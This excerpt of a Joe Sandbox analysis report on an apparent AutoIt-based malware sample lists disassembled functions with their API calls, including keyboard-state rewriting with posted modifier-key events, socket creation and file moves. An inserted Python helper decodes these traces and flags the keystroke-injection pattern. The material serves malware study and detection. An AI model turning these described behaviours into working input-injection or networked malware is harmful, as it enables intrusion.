                                      • Opcode ID: 40be5c75c6603572fe7d1d299eab6209a98ea8fc3e12398fe52066b44d93df1c
                                      • Instruction ID: 161098bd75b8b8f2a75786207837900c73e1fa8386630af87d86a31ba2ad93aa
                                      • Opcode Fuzzy Hash: 40be5c75c6603572fe7d1d299eab6209a98ea8fc3e12398fe52066b44d93df1c
                                      • Instruction Fuzzy Hash: 4D917DB1A04219AFDF24CFA5CC84FAEBBB8EF46714F108559F615AB281D7709941CFA0
                                      APIs
                                      • SafeArrayGetVartype.OLEAUT32(00000001,?), ref: 008F125C
                                      • SafeArrayAccessData.OLEAUT32(00000000,?), ref: 008F1284
                                      • SafeArrayUnaccessData.OLEAUT32(00000001), ref: 008F12A8
                                      • SafeArrayAccessData.OLEAUT32(00000001,?), ref: 008F12D8
                                      • SafeArrayAccessData.OLEAUT32(00000001,?), ref: 008F135F
                                      • SafeArrayAccessData.OLEAUT32(00000001,?), ref: 008F13C4
                                      • SafeArrayAccessData.OLEAUT32(00000001,?), ref: 008F1430
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2026164990.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                       • Associated: 00000000.00000002.2026144810.0000000000880000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2026164990.0000000000942000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2026164990.000000000094C000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2026164990.000000000095A000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2026164990.00000000009DB000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2026418762.00000000009E1000.00000080.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2026430792.00000000009E2000.00000004.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_880000_SAL987656700.jbxd
                                      Similarity
                                      • API ID: ArraySafe$Data$Access$UnaccessVartype
                                      • String ID:
                                      • API String ID: 2550207440-0
                                      • Opcode ID: a888fffd68553ac6db7a51f96827aa8f65f4a37fd7050db13a4284b40f9ba03b
                                      • Instruction ID: 623d55d6fcf91dea3feddb88a899e9274f4b92e01d3ef5879cdec7e2c99a0ca2
                                      • Opcode Fuzzy Hash: a888fffd68553ac6db7a51f96827aa8f65f4a37fd7050db13a4284b40f9ba03b
                                      • Instruction Fuzzy Hash: B6918B71A0021DEFDB01DFA8C888BBEB7B5FF45325F144029EA10EB292D774A941CB95
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2026164990.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                       • Associated: 00000000.00000002.2026144810.0000000000880000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2026164990.0000000000942000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2026164990.000000000094C000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2026164990.000000000095A000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2026164990.00000000009DB000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2026418762.00000000009E1000.00000080.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2026430792.00000000009E2000.00000004.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_880000_SAL987656700.jbxd
                                      Similarity
                                      • API ID: ObjectSelect$BeginCreatePath
                                      • String ID:
                                      • API String ID: 3225163088-0
                                      • Opcode ID: 1f4648a862592f7793d5a8cb8f67abc4e44c01716536f167bce07d1056c40d1d
                                      • Instruction ID: 421bc29e73036f6f6c5da00a7249c0039c44f28c480323b2e05df5fa81ad36f3
                                      • Opcode Fuzzy Hash: 1f4648a862592f7793d5a8cb8f67abc4e44c01716536f167bce07d1056c40d1d
                                      • Instruction Fuzzy Hash: 51913471A44219AFCF15DFA9CC84AEEBBB8FF49320F18814AE555F7251D334AA41CB60
                                      APIs
                                      • VariantInit.OLEAUT32(?), ref: 0090396B
                                      • CharUpperBuffW.USER32(?,?), ref: 00903A7A
                                      • _wcslen.LIBCMT ref: 00903A8A
                                      • VariantClear.OLEAUT32(?), ref: 00903C1F
                                        • Part of subcall function 008F0CDF: VariantInit.OLEAUT32(00000000), ref: 008F0D1F
                                        • Part of subcall function 008F0CDF: VariantCopy.OLEAUT32(?,?), ref: 008F0D28
                                        • Part of subcall function 008F0CDF: VariantClear.OLEAUT32(?), ref: 008F0D34
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2026164990.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                       • Associated: 00000000.00000002.2026144810.0000000000880000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2026164990.0000000000942000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2026164990.000000000094C000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2026164990.000000000095A000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2026164990.00000000009DB000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2026418762.00000000009E1000.00000080.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2026430792.00000000009E2000.00000004.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_880000_SAL987656700.jbxd
                                      Similarity
                                      • API ID: Variant$ClearInit$BuffCharCopyUpper_wcslen
                                      • String ID: AUTOIT.ERROR$Incorrect Parameter format
                                      • API String ID: 4137639002-1221869570
                                      • Opcode ID: 2d344cae003909256bafe2eedf9875e0d9c51d696ddfb2e19a59eb9466dc9801
                                      • Instruction ID: 355466708d89315a95fc3ffbae7ef31d532bcd26ab81fec199cfc4cb94962fbc
                                      • Opcode Fuzzy Hash: 2d344cae003909256bafe2eedf9875e0d9c51d696ddfb2e19a59eb9466dc9801
                                      • Instruction Fuzzy Hash: 989136756083059FC714EF68C48096AB7E9FF89314F14882DF89997391DB31EE45CB92
                                      APIs
                                        • Part of subcall function 008E000E: CLSIDFromProgID.COMBASE ref: 008E002B
                                        • Part of subcall function 008E000E: ProgIDFromCLSID.COMBASE(?,00000000), ref: 008E0046
                                        • Part of subcall function 008E000E: lstrcmpiW.KERNEL32(?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,008DFF41,80070057,?,?), ref: 008E0054
                                        • Part of subcall function 008E000E: CoTaskMemFree.COMBASE(00000000), ref: 008E0064
                                      • CoInitializeSecurity.COMBASE(00000000,000000FF,00000000,00000000,00000002,00000003,00000000,00000000,00000000), ref: 00904C51
                                      • _wcslen.LIBCMT ref: 00904D59
                                      • CoCreateInstanceEx.COMBASE(?,00000000,00000015,?,00000001,?), ref: 00904DCF
                                      • CoTaskMemFree.COMBASE(?), ref: 00904DDA
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2026164990.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                       • Associated: 00000000.00000002.2026144810.0000000000880000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2026164990.0000000000942000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2026164990.000000000094C000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2026164990.000000000095A000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2026164990.00000000009DB000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2026418762.00000000009E1000.00000080.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2026430792.00000000009E2000.00000004.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_880000_SAL987656700.jbxd
                                      Similarity
                                      • API ID: FreeFromProgTask$CreateInitializeInstanceSecurity_wcslenlstrcmpi
                                      • String ID: NULL Pointer assignment
                                      • API String ID: 614568839-2785691316
                                      • Opcode ID: c1280354cba12d1e107c534c1cd7b8383e8aea2bd936f5f888256a25780dff7a
                                      • Instruction ID: c591d929e55709f8847dd8e7b290458599a9ab73437cb0fb9f1d25bfd3cd7aa8
                                      • Opcode Fuzzy Hash: c1280354cba12d1e107c534c1cd7b8383e8aea2bd936f5f888256a25780dff7a
                                      • Instruction Fuzzy Hash: EF9108B1D0021D9FDF14DFA4C891AEDB7B8FF48310F108569E515A7291EB74AA44CFA1
                                      APIs
                                      • GetMenu.USER32(?), ref: 00912183
                                      • GetMenuItemCount.USER32(00000000), ref: 009121B5
                                      • GetMenuStringW.USER32(00000000,00000000,?,00007FFF,00000400), ref: 009121DD
                                      • _wcslen.LIBCMT ref: 00912213
                                      • GetMenuItemID.USER32(?,?), ref: 0091224D
                                      • GetSubMenu.USER32(?,?), ref: 0091225B
                                        • Part of subcall function 008E3A3D: GetWindowThreadProcessId.USER32(?,00000000), ref: 008E3A57
                                        • Part of subcall function 008E3A3D: GetCurrentThreadId.KERNEL32 ref: 008E3A5E
                                        • Part of subcall function 008E3A3D: AttachThreadInput.USER32(00000000,?,00000000,00000000,?,008E25B3), ref: 008E3A65
                                      • PostMessageW.USER32(?,00000111,00000000,00000000), ref: 009122E3
                                        • Part of subcall function 008EE97B: Sleep.KERNEL32 ref: 008EE9F3
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2026164990.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                       • Associated: 00000000.00000002.2026144810.0000000000880000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2026164990.0000000000942000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2026164990.000000000094C000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2026164990.000000000095A000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2026164990.00000000009DB000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2026418762.00000000009E1000.00000080.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2026430792.00000000009E2000.00000004.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_880000_SAL987656700.jbxd
                                      Similarity
                                      • API ID: Menu$Thread$Item$AttachCountCurrentInputMessagePostProcessSleepStringWindow_wcslen
                                      • String ID:
                                      • API String ID: 4196846111-0
                                      • Opcode ID: ca7649d149a72c70588ebc33249ff0df0659729b9268f5d5990d6f5bd089f651
                                      • Instruction ID: 0b6043b221e3dd7a7d0bfab5b0de1ba1fe4ec2169033e3dbb6d8eac57923494b
                                      • Opcode Fuzzy Hash: ca7649d149a72c70588ebc33249ff0df0659729b9268f5d5990d6f5bd089f651
                                      • Instruction Fuzzy Hash: 01718D75A04209AFCB14EF68C841AEEB7F5FF48310F148858E926EB351DB34AD918B91
                                      APIs
                                      • GetParent.USER32(?), ref: 008EAEF9
                                      • GetKeyboardState.USER32(?), ref: 008EAF0E
                                      • SetKeyboardState.USER32(?), ref: 008EAF6F
                                      • PostMessageW.USER32(?,00000101,00000010,?), ref: 008EAF9D
                                      • PostMessageW.USER32(?,00000101,00000011,?), ref: 008EAFBC
                                      • PostMessageW.USER32(?,00000101,00000012,?), ref: 008EAFFD
                                      • PostMessageW.USER32(?,00000101,0000005B,?), ref: 008EB020
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2026164990.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                       • Associated: 00000000.00000002.2026144810.0000000000880000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2026164990.0000000000942000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2026164990.000000000094C000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2026164990.000000000095A000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2026164990.00000000009DB000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2026418762.00000000009E1000.00000080.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2026430792.00000000009E2000.00000004.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_880000_SAL987656700.jbxd
                                      Similarity
                                      • API ID: MessagePost$KeyboardState$Parent
                                      • String ID:
                                      • API String ID: 87235514-0
                                      • Opcode ID: 5fc4b1a5d89e513d186b13cf50068e5024febe439f31064891f600df02657477
                                      • Instruction ID: 1bdc6c9a97950fdf50a8862500e0dc4e40e3ecaba40734e1d8cd40459b65b1c6
                                      • Opcode Fuzzy Hash: 5fc4b1a5d89e513d186b13cf50068e5024febe439f31064891f600df02657477
                                      • Instruction Fuzzy Hash: F851D2A06047D53DFB3A43758845BBB7EA9AB07704F088489E1E5D54C2C798FC84D752
                                      APIs
                                      • GetParent.USER32(00000000), ref: 008EAD19
                                      • GetKeyboardState.USER32(?), ref: 008EAD2E
                                      • SetKeyboardState.USER32(?), ref: 008EAD8F
                                      • PostMessageW.USER32(00000000,00000100,00000010,?), ref: 008EADBB
                                      • PostMessageW.USER32(00000000,00000100,00000011,?), ref: 008EADD8
                                      • PostMessageW.USER32(00000000,00000100,00000012,?), ref: 008EAE17
                                      • PostMessageW.USER32(00000000,00000100,0000005B,?), ref: 008EAE38
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2026164990.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                       • Associated: 00000000.00000002.2026144810.0000000000880000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2026164990.0000000000942000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2026164990.000000000094C000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2026164990.000000000095A000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2026164990.00000000009DB000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2026418762.00000000009E1000.00000080.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2026430792.00000000009E2000.00000004.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_880000_SAL987656700.jbxd
                                      Similarity
                                      • API ID: MessagePost$KeyboardState$Parent
                                      • String ID:
                                      • API String ID: 87235514-0
                                      • Opcode ID: 4c537c798b2d83bfa40bca88b0b24edbf748eedd6b12b326c5860baefe92b741
                                      • Instruction ID: ca605b4881d27d2de9bb1eda1834cd1f5b5221efd1eb65bf709dd32c62ce97b9
                                      • Opcode Fuzzy Hash: 4c537c798b2d83bfa40bca88b0b24edbf748eedd6b12b326c5860baefe92b741
                                      • Instruction Fuzzy Hash: 6F51D6A16047D63DFB3A42658C95BBA7E99FF47B00F088488E1D5D68C2C294FC88D752
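                                       The two keyboard-state routines above (GetKeyboardState, SetKeyboardState, then PostMessageW with message 0x100 or 0x101 and wParam 0x10, 0x11, 0x12, 0x5B) and the menu walker before them appear in the report only as raw hex arguments. The helper below is an added example, not part of the Joe Sandbox report or of the sample: it parses API lines in this section's format, resolves the message and virtual-key constants to their winuser.h names (WM_KEYDOWN, WM_KEYUP, WM_COMMAND, VK_SHIFT, VK_CONTROL, VK_MENU, VK_LWIN), and flags a function that saves and rewrites the keyboard state and then posts key events for all four modifiers, which is the shape of keystroke injection into another window's message queue. That flag and the function names are the editor's own; the sample lines are copied from this section.

```python
"""Decode Joe Sandbox "APIs" trace lines like those in this report section.

Added example, not part of the Joe Sandbox report or of SAL987656700.exe: it
parses bullet lines of the form API.MODULE(args), ref: address, resolves the
Win32 constants that this section shows as raw hex, and flags the call shape
that injects modifier-key events into another window's queue.
SAMPLE_* below are copied from the report; constant values are from winuser.h.
"""
import re
from dataclasses import dataclass
from typing import List, Optional

# Message IDs that appear as the second argument of Send/PostMessageW here.
WM_NAMES = {0x0030: "WM_SETFONT", 0x0100: "WM_KEYDOWN", 0x0101: "WM_KEYUP",
            0x0111: "WM_COMMAND", 0x0142: "CB_SETEDITSEL"}
# Virtual-key codes posted by the keyboard-state routines.
VK_NAMES = {0x10: "VK_SHIFT", 0x11: "VK_CONTROL", 0x12: "VK_MENU", 0x5B: "VK_LWIN"}

# Matches "PostMessageW.USER32(?,00000101,00000010,?), ref: 008EAF9D",
# "_wcslen.LIBCMT ref: 00912213" and the "Part of subcall function X:" prefix.
LINE_RE = re.compile(
    r"(?:Part of subcall function (?P<sub>[0-9A-F]+): )?"
    r"(?P<api>\w+)\.(?P<mod>[A-Z0-9]+)"
    r"(?:\((?P<args>[^)]*)\))?,? ref: (?P<ref>[0-9A-F]+)")


@dataclass
class Call:
    api: str
    module: str
    args: list                      # int per hex literal, None where the report shows '?'
    ref: int
    subcall_of: Optional[int] = None


def parse_api_lines(text: str) -> List[Call]:
    """Parse every recognisable API bullet line; lines that do not match are skipped."""
    calls = []
    for line in text.splitlines():
        m = LINE_RE.search(line)
        if not m:
            continue
        raw = m.group("args")
        args = [] if raw is None else [
            None if a.strip() == "?" else int(a, 16) & 0xFFFFFFFF
            for a in raw.split(",")]
        sub = int(m.group("sub"), 16) if m.group("sub") else None
        calls.append(Call(m.group("api"), m.group("mod"), args, int(m.group("ref"), 16), sub))
    return calls


def describe(call: Call) -> str:
    """Render a call with the constants used in this section resolved to names."""
    if call.api in ("PostMessageW", "SendMessageW") and len(call.args) >= 3:
        msg, wparam = call.args[1], call.args[2]
        name = WM_NAMES.get(msg, "?" if msg is None else f"0x{msg:04X}")
        if msg in (0x0100, 0x0101) and wparam in VK_NAMES:
            return f"{call.api}({name}, {VK_NAMES[wparam]})"
        return f"{call.api}({name})"
    if call.api == "GetDeviceCaps" and len(call.args) >= 2 and call.args[1] == 0x5A:
        return "GetDeviceCaps(LOGPIXELSY)"
    return f"{call.api}.{call.module}"


def injects_modifier_keys(calls: List[Call]) -> bool:
    """True when a function reads and rewrites the keyboard state and then posts
    WM_KEYDOWN or WM_KEYUP for Shift, Ctrl, Alt and LWin: the shape of keystroke
    injection into another window's queue.  This is the editor's reading of the
    trace, not a Joe Sandbox signature."""
    apis = {c.api for c in calls}
    if not {"GetKeyboardState", "SetKeyboardState"} <= apis:
        return False
    posted = {c.args[2] for c in calls
              if c.api == "PostMessageW" and len(c.args) >= 3
              and c.args[1] in (0x0100, 0x0101)}
    return set(VK_NAMES) <= posted


# Copied from the report: the WM_KEYUP routine at 008EAEF9 and part of the menu walker at 00912183.
SAMPLE_KEYUP = """\
• GetParent.USER32(?), ref: 008EAEF9
• GetKeyboardState.USER32(?), ref: 008EAF0E
• SetKeyboardState.USER32(?), ref: 008EAF6F
• PostMessageW.USER32(?,00000101,00000010,?), ref: 008EAF9D
• PostMessageW.USER32(?,00000101,00000011,?), ref: 008EAFBC
• PostMessageW.USER32(?,00000101,00000012,?), ref: 008EAFFD
• PostMessageW.USER32(?,00000101,0000005B,?), ref: 008EB020
"""
SAMPLE_MENU = """\
• GetMenu.USER32(?), ref: 00912183
• GetMenuItemCount.USER32(00000000), ref: 009121B5
• _wcslen.LIBCMT ref: 00912213
  • Part of subcall function 008E3A3D: AttachThreadInput.USER32(00000000,?,00000000,00000000,?,008E25B3), ref: 008E3A65
• PostMessageW.USER32(?,00000111,00000000,00000000), ref: 009122E3
"""

if __name__ == "__main__":
    for block in (SAMPLE_KEYUP, SAMPLE_MENU):
        calls = parse_api_lines(block)
        for c in calls:
            print(f"{c.ref:08X}  {describe(c)}")
        print("modifier-key injection:", injects_modifier_keys(calls))
```

                                       Unresolved arguments stay as None rather than being guessed, so a decode never fires on a '?' placeholder; to cover other functions in the report, extend WM_NAMES and VK_NAMES with the values you have verified against winuser.h.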
                                      APIs
                                      • GetConsoleCP.KERNEL32(008C3CD6,?,?,?,?,?,?,?,?,008B5BA3,?,?,008C3CD6,?,?), ref: 008B5470
                                      • __fassign.LIBCMT ref: 008B54EB
                                      • __fassign.LIBCMT ref: 008B5506
                                      • WideCharToMultiByte.KERNEL32(?,00000000,?,00000001,008C3CD6,00000005,00000000,00000000), ref: 008B552C
                                      • WriteFile.KERNEL32(?,008C3CD6,00000000,008B5BA3,00000000,?,?,?,?,?,?,?,?,?,008B5BA3,?), ref: 008B554B
                                      • WriteFile.KERNEL32(?,?,00000001,008B5BA3,00000000,?,?,?,?,?,?,?,?,?,008B5BA3,?), ref: 008B5584
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2026164990.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                       • Associated: 00000000.00000002.2026144810.0000000000880000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2026164990.0000000000942000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2026164990.000000000094C000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2026164990.000000000095A000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2026164990.00000000009DB000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2026418762.00000000009E1000.00000080.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2026430792.00000000009E2000.00000004.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_880000_SAL987656700.jbxd
                                      Similarity
                                      • API ID: FileWrite__fassign$ByteCharConsoleMultiWide
                                      • String ID:
                                      • API String ID: 1324828854-0
                                      • Opcode ID: 50002bb04ece7f38e2b517dcfe7b1084930c5a64f62aad0f8156088bf44833c6
                                      • Instruction ID: be16a165de4fec89cbe64faf855c3d114f47231d48e5cc1a9bbd5642cb690863
                                      • Opcode Fuzzy Hash: 50002bb04ece7f38e2b517dcfe7b1084930c5a64f62aad0f8156088bf44833c6
                                      • Instruction Fuzzy Hash: EE51C0B0A00649AFDB20CFA8D851BEEBBF9FF09301F14411AE955E7391D6309A45CB60
                                      APIs
                                      • _ValidateLocalCookies.LIBCMT ref: 008A2D4B
                                      • ___except_validate_context_record.LIBVCRUNTIME ref: 008A2D53
                                      • _ValidateLocalCookies.LIBCMT ref: 008A2DE1
                                      • __IsNonwritableInCurrentImage.LIBCMT ref: 008A2E0C
                                      • _ValidateLocalCookies.LIBCMT ref: 008A2E61
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2026164990.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                       • Associated: 00000000.00000002.2026144810.0000000000880000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2026164990.0000000000942000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2026164990.000000000094C000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2026164990.000000000095A000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2026164990.00000000009DB000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2026418762.00000000009E1000.00000080.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2026430792.00000000009E2000.00000004.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_880000_SAL987656700.jbxd
                                      Similarity
                                      • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
                                      • String ID: csm
                                      • API String ID: 1170836740-1018135373
                                      • Opcode ID: e2d2a83e25aec50578f3c852dca7cb8c98bafcc8cc8d0b109a2aa7b6027ad002
                                      • Instruction ID: bdeae2b925621a8e6464ef1dc121ff0c331058d8658cfa396d7941c473053ece
                                      • Opcode Fuzzy Hash: e2d2a83e25aec50578f3c852dca7cb8c98bafcc8cc8d0b109a2aa7b6027ad002
                                      • Instruction Fuzzy Hash: 9441A134A0020DABDF20DF6CC845A9EBBB5FF46328F148165E814EBA53D735DA11CB91
                                      APIs
                                        • Part of subcall function 0090304E: inet_addr.WS2_32(?), ref: 0090307A
                                        • Part of subcall function 0090304E: _wcslen.LIBCMT ref: 0090309B
                                      • socket.WS2_32(00000002,00000001,00000006), ref: 00901112
                                      • WSAGetLastError.WS2_32 ref: 00901121
                                      • WSAGetLastError.WS2_32 ref: 009011C9
                                      • closesocket.WS2_32(00000000), ref: 009011F9
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2026164990.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                       • Associated: 00000000.00000002.2026144810.0000000000880000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2026164990.0000000000942000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2026164990.000000000094C000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2026164990.000000000095A000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2026164990.00000000009DB000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2026418762.00000000009E1000.00000080.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2026430792.00000000009E2000.00000004.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_880000_SAL987656700.jbxd
                                      Similarity
                                      • API ID: ErrorLast$_wcslenclosesocketinet_addrsocket
                                      • String ID:
                                      • API String ID: 2675159561-0
                                      • Opcode ID: 8dedbeaf464a86097bb24fbd4d860a9d76f1174c8c2ad48999ff77f301d1f2ad
                                      • Instruction ID: ed8c6b1affde3f21617861577291474a0fdbdfbf4d182faa8dac61ae4055c4d7
                                      • Opcode Fuzzy Hash: 8dedbeaf464a86097bb24fbd4d860a9d76f1174c8c2ad48999ff77f301d1f2ad
                                      • Instruction Fuzzy Hash: 3841D071604204AFDB14AF28C884BAABBE9FF85328F148059F9159B2D1C7B4ED41CBE1
                                      APIs
                                        • Part of subcall function 008EDDE0: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,008ECF22,?), ref: 008EDDFD
                                        • Part of subcall function 008EDDE0: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,008ECF22,?), ref: 008EDE16
                                      • lstrcmpiW.KERNEL32(?,?), ref: 008ECF45
                                      • MoveFileW.KERNEL32(?,?), ref: 008ECF7F
                                      • _wcslen.LIBCMT ref: 008ED005
                                      • _wcslen.LIBCMT ref: 008ED01B
                                      • SHFileOperationW.SHELL32(?), ref: 008ED061
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2026164990.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                       • Associated: 00000000.00000002.2026144810.0000000000880000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2026164990.0000000000942000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2026164990.000000000094C000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2026164990.000000000095A000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2026164990.00000000009DB000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2026418762.00000000009E1000.00000080.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2026430792.00000000009E2000.00000004.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_880000_SAL987656700.jbxd
                                      Similarity
                                      • API ID: FileFullNamePath_wcslen$MoveOperationlstrcmpi
                                      • String ID: \*.*
                                      • API String ID: 3164238972-1173974218
                                      • Opcode ID: 26c4ad013f379712fbe6e3cb93d8726c64058114693bd68f58f49069c5d37fb5
                                      • Instruction ID: cef18912c166fed3f6be9425f6f82ad94481b6e1a932454ae7c039d1925d3734
                                      • Opcode Fuzzy Hash: 26c4ad013f379712fbe6e3cb93d8726c64058114693bd68f58f49069c5d37fb5
                                      • Instruction Fuzzy Hash: B84163B1D452585FDF12EBA5C981ADEB7B9FF09380F0000E6E505EB141EE74E689CB51
                                      APIs
                                      • SendMessageW.USER32(00000000,000000F0,00000000,00000000), ref: 00912E1C
                                      • GetWindowLongW.USER32(00000000,000000F0), ref: 00912E4F
                                      • GetWindowLongW.USER32(00000000,000000F0), ref: 00912E84
                                      • SendMessageW.USER32(00000000,000000F1,00000000,00000000), ref: 00912EB6
                                      • SendMessageW.USER32(00000000,000000F1,00000001,00000000), ref: 00912EE0
                                      • GetWindowLongW.USER32(00000000,000000F0), ref: 00912EF1
                                      • SetWindowLongW.USER32(00000000,000000F0,00000000), ref: 00912F0B
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2026164990.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                       • Associated: 00000000.00000002.2026144810.0000000000880000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2026164990.0000000000942000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2026164990.000000000094C000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2026164990.000000000095A000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2026164990.00000000009DB000.00000040.00000001.01000000.00000003.sdmp
